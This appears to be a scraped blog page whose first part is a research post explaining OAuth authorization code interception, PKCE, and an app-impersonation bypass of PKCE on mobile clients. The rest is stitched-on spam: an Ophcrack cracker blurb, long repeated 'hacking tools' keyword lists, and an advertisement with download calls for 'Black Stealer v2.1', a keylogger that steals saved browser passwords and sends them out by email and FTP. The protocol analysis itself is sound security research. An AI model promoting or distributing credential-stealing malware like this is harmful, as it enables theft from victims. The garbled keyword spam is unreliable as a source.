Tuesday, August 25, 2020

PKCE: What Can(Not) Be Protected


This post is about PKCE [RFC7636], a protection mechanism for OAuth and OpenIDConnect designed for public clients to detect the authorization code interception attack.
At the beginning of our research, we wrongly believed that PKCE protects mobile and native apps from the so called „App Impersonation" attacks. Considering our ideas and after a short discussion with the authors of the PKCE specification, we found out that PKCE does not address this issue.
In other words, the protection of PKCE can be bypassed on public clients (mobile and native apps) by using a maliciously acting app.

OAuth Code Flow


In Figure 1, we briefly introduce how the OAuth flow works on mobile apps and show show the reason why we do need PKCE.
In our example the user has two apps installed on the mobile phone: an Honest App and an Evil App. We assume that the Evil App is able to register the same handler as the Honest App and thus intercept messages sent to the Honest App. If you are more interested in this issue, you can find more information here [1].

Figure 1: An example of the "authorization code interception" attack on mobile devices. 

Step 1: A user starts the Honest App and initiates the authentication via OpenID Connect or the authorization via OAuth. Consequentially, the Honest App generates an Auth Request containing the OpenID Connect/OAuth parameters: client_id, state, redirect_uri, scope, authorization_grant, nonce, …. 
Step 2: The Browser is called and the Auth Request is sent to the Authorization Server (usually Facebook, Google, …).
  • The Honest App could use a Web View browser. However, the current specification clearly advice to use the operating system's default browser and avoid the usage of Web Views [2]. In addition, Google does not allow the usage of Web View browser since August 2016 [3].
Step 3: We asume that the user is authenticated and he authorizes the access to the requested resources. As a result, the Auth Response containing the code is sent back to the browser.

Step 4: Now, the browser calls the Honest App registered handler. However, the Evil App is registered on this handler too and receives the code.

Step 5: The Evil App sends the stolen code to the Authorization Server and receives the corresponding access_token in step 6. Now, the Evil App can access the authorized ressources.
  • Optionally, in step 5 the App can authenticate on the Authorization Server via client_id, client_secret. Since, Apps are public clients they do not have any protection mechanisms regarding the storage of this information. Thus, an attacker can easy get this information and add it to the Evil App.

    Proof Key for Code Exchange - PKCE (RFC 7636)

    Now, let's see how PKCE does prevent the attack. The basic idea of PKCE is to bind the Auth Request in Step 1 to the code redemption in Step 5. In other words, only the app generated the Auth Request is able to redeem the generated code.


    Figure 2: PKCE - RFC 7636 

    Step 1: The Auth Request is generated as previosly described. Additionally, two parameters are added:
    • The Honest App generates a random string called code_verifier
    • The Honest App computes the code_challenge=SHA-256(code_verifier)
    • The Honest App specifies the challenge_method=SHA256

    Step 2: The Authorization Server receives the Auth Request and binds the code to the received code_challenge and challenge_method.
    • Later in Step 5, the Authorzation Server expects to receive the code_verifier. By comparing the SHA-256(code_verifier) value with the recieved code_challenge, the Authorization Server verifies that the sender of the Auth Request ist the same as the sender of the code.
    Step 3-4: The code leaks again to the Evil App.

    Step 5: Now, Evil App must send the code_verifier together with the code. Unfortunatelly, the App does not have it and is not able to compute it. Thus, it cannot redeem the code.

     PKCE Bypass via App Impersonation

    Again, PKCE binds the Auth Request to the coderedemption.
    The question rises, if an Evil App can build its own Auth Request with its own code_verifier, code_challenge and challenge_method.The short answer is – yes, it can.

    Figure 3: Bypassing PKCE via the App Impersonation attack
    Step 1: The Evil App generates an Auth Request. The Auth Request contains the client_id and redirect_uri of the Honest App. Thus, the User and the Authorization Server cannot recognize that the Evil App initiates this request. 

    Step 2-4: These steps do not deviate from the previous description in Figure 2.

    Step 5: In Step 5 the Evil App sends the code_verifier used for the computation of the code_challenge. Thus, the stolen code can be successfully redeemed and the Evil App receives the access_token and id_token.

    OAuth 2.0 for Native Apps

    The attack cannot be prevented by PKCE. However, the IETF working group is currently working on a Draft describing recommendations for using OAuth 2.0 for native apps.

    References

    Vladislav Mladenov
    Christian Mainka (@CheariX)
    More articles

    Ophcrack


    " Ophcrack is an open source (GPL license) program that cracks Windows LM hashes using rainbow tables. The program includes the ability to import the hashes from a variety of formats, including dumping directly from the SAM files of Windows. There is also a Live CD version which automates the retrieval, decryption, and cracking of passwords from a Windows system. Rainbow tables for LM hashes of alphanumeric passwords are provided for free by the developers. These tables can crack 99.9% of alphanumeric passwords of up to 14 characters in usually a few seconds, and at most a few minutes. Larger rainbow tables (for LM hashes of passwords with all printable characters, including symbols and space) are available for purchase from Objectif Securité. Starting with version 2.3, Ophcrack also cracks NT hashes. This is necessary if generation of the LM hash is disabled (this is default on Windows Vista), or if the password is longer than 14 characters (in which case the LM hash is not stored)." read more...

    Website: http://ophcrack.sourceforge.net

    Related posts
    1. Hacks And Tools
    2. Hacking Tools Pc
    3. Hacker Tools Github
    4. Hacker Tools Linux
    5. Kik Hack Tools
    6. Pentest Tools For Android
    7. Hacker Tools Windows
    8. Hacking Tools Software
    9. Game Hacking
    10. Wifi Hacker Tools For Windows
    11. How To Install Pentest Tools In Ubuntu
    12. Hack App
    13. Usb Pentest Tools
    14. Hack Tools For Games
    15. Hacking Tools Free Download
    16. Pentest Tools Website
    17. Hacker Tools 2020
    18. Physical Pentest Tools
    19. Hack App
    20. Hacker Tools Free
    21. Hacking Tools For Pc
    22. Hacking Tools Free Download
    23. Hack Tool Apk No Root
    24. Hacker Hardware Tools
    25. Hack Tools
    26. How To Make Hacking Tools
    27. Hacking Tools Software
    28. Hacking Tools Online
    29. Game Hacking
    30. Hacker Tools For Pc
    31. Pentest Automation Tools
    32. Hack Tool Apk
    33. Pentest Tools Bluekeep
    34. How To Make Hacking Tools
    35. Hacking Tools Free Download
    36. Hacks And Tools
    37. Hacker Search Tools
    38. Github Hacking Tools
    39. Pentest Tools Open Source
    40. Free Pentest Tools For Windows
    41. Pentest Tools Linux
    42. Hacking Apps
    43. Usb Pentest Tools
    44. Nsa Hacker Tools
    45. Hacker Tools Apk
    46. Hacking Tools And Software
    47. Hacker Tools Free
    48. Hacker Tools Apk
    49. Hack Rom Tools
    50. New Hacker Tools
    51. Pentest Tools Website Vulnerability
    52. Hacker Tools Free Download
    53. Pentest Tools Nmap
    54. Pentest Tools Download
    55. Hack App
    56. Pentest Tools For Android
    57. Underground Hacker Sites
    58. Nsa Hacker Tools
    59. Hacking Tools 2019
    60. Easy Hack Tools
    61. Hacking App
    62. Pentest Recon Tools
    63. Growth Hacker Tools
    64. Hacker Tools List
    65. Hacker Tools For Windows
    66. Pentest Tools Subdomain
    67. Hacker Tools Software
    68. Hack Tools 2019
    69. What Are Hacking Tools
    70. How To Hack
    71. Hack Tools Download
    72. Pentest Tools Framework
    73. Hacker Security Tools
    74. How To Make Hacking Tools
    75. Termux Hacking Tools 2019
    76. Top Pentest Tools
    77. Hacking Tools Download
    78. Hacking Tools 2020
    79. Hacking Tools For Windows Free Download
    80. Hacker Tools List
    81. Ethical Hacker Tools
    82. Pentest Automation Tools
    83. Pentest Tools
    84. Hacking Tools Software
    85. Hacking Tools Free Download
    86. Hacker Tools Free Download
    87. Hacker Tools Windows
    88. How To Make Hacking Tools
    89. Hacker Tools Linux
    90. Hack Tools 2019
    91. Game Hacking
    92. Hacker Tools Hardware
    93. Hacking Tools For Windows Free Download
    94. Hacker Tools Mac
    95. Hacker Tools Apk
    96. What Is Hacking Tools
    97. How To Install Pentest Tools In Ubuntu
    98. Blackhat Hacker Tools
    99. Pentest Tools Bluekeep
    100. Hackrf Tools

    DOWNLOAD BLACK STEALER V2.1 FULL

    BLACK STEALER V2.1 FULL

    Black Stealer v2.1 is an advanced keylogger that can steal even saved passwords from the browsers and sends through Email and FTP. It's really easy to the crypt. Keylogger is a computer program that is a type of surveillance technology used to monitor and record each keystroke typed on a specific computer's keyboard by the user, especially in order to gain unauthorized access to the passwords and other confidential information. It's also called a keystroke logger or system monitor. Download black stealer v2.1 full.

    DOWNLOAD BLACK STEALER V2.1 FULL

    Related articles

    1. Hacking Tools Name
    2. Pentest Tools Linux
    3. Physical Pentest Tools
    4. Underground Hacker Sites
    5. New Hack Tools
    6. Hack Tools For Mac
    7. Pentest Tools List
    8. Hack Tools For Ubuntu
    9. Pentest Reporting Tools
    10. Wifi Hacker Tools For Windows
    11. How To Make Hacking Tools
    12. Hacker Tools Github
    13. Best Hacking Tools 2020
    14. Hacking Tools Pc
    15. Physical Pentest Tools
    16. Hak5 Tools
    17. Hacker Tools Hardware
    18. Hacker Tools For Windows
    19. Blackhat Hacker Tools
    20. World No 1 Hacker Software
    21. Wifi Hacker Tools For Windows
    22. Tools 4 Hack
    23. Bluetooth Hacking Tools Kali
    24. Hackers Toolbox
    25. Hacking Tools Github
    26. Pentest Tools Windows
    27. Pentest Box Tools Download
    28. Termux Hacking Tools 2019
    29. Computer Hacker
    30. Pentest Tools Website Vulnerability
    31. Hacker Tools Apk
    32. Hacker Tools Mac
    33. Pentest Tools Port Scanner
    34. Pentest Tools Website
    35. Hacker Tools Github
    36. Hacking Tools 2019
    37. Hacker Tools Apk
    38. Hacking Tools Download
    39. Hacking Tools Pc
    40. Pentest Tools Apk
    41. Install Pentest Tools Ubuntu
    42. Blackhat Hacker Tools
    43. Game Hacking
    44. Pentest Tools
    45. Pentest Tools For Windows
    46. Wifi Hacker Tools For Windows
    47. Pentest Tools Nmap
    48. Hacks And Tools
    49. Hacker Hardware Tools
    50. Pentest Tools
    51. Hacker Tool Kit
    52. Hack Tools For Mac
    53. Hacker Search Tools
    54. Hacking Tools 2020
    55. Hacker Tools Github
    56. Hacking Tools Free Download
    57. Tools 4 Hack
    58. Hacker Hardware Tools
    59. Hack Tools Pc
    60. Pentest Box Tools Download
    61. Pentest Tools For Android
    62. Android Hack Tools Github
    63. Hacker Tools For Pc
    64. Hack Tools Download
    65. Hack Tools For Ubuntu
    66. Bluetooth Hacking Tools Kali
    67. Hacking Tools 2019
    68. Pentest Tools For Ubuntu
    69. Pentest Tools Github
    70. Hacking Tools Kit
    71. Pentest Tools Url Fuzzer
    72. Hacking Apps
    73. Hacker Tools
    74. Pentest Automation Tools
    75. Tools 4 Hack
    76. Pentest Box Tools Download
    77. Pentest Tools Tcp Port Scanner
    78. Growth Hacker Tools
    79. Hacking Tools Download
    80. Pentest Tools Review
    81. Growth Hacker Tools
    82. Hacker Tools
    83. Hacker Tools Mac
    84. Hacker Tools Windows
    85. New Hack Tools
    86. Pentest Tools Review
    87. Pentest Reporting Tools
    88. Hacking Tools Pc
    89. Hacker Security Tools
    90. Pentest Box Tools Download
    91. Hack App
    92. Game Hacking
    93. Hacking Tools And Software
    94. Hack Tools Download
    95. Hacking Tools Pc
    96. Free Pentest Tools For Windows
    97. Hacker Tools Mac
    98. Pentest Tools For Mac
    99. Hacking Tools 2020
    100. Hack Rom Tools
    101. Hack Tools Github
    102. Hack Tools Github
    103. Hacking Tools Pc
    104. Hacking Tools Windows 10
    105. Pentest Tools Alternative
    106. Pentest Tools For Mac
    107. Bluetooth Hacking Tools Kali
    108. Hacker Tools Free
    109. Pentest Tools List
    110. Hacking Tools 2020
    111. Hacking Tools Name
    112. Kik Hack Tools
    113. Hacking Tools Mac
    114. Hacking Tools Pc
    115. Termux Hacking Tools 2019
    116. Hacking Tools Windows
    117. Hacking Tools For Windows 7
    118. Nsa Hacker Tools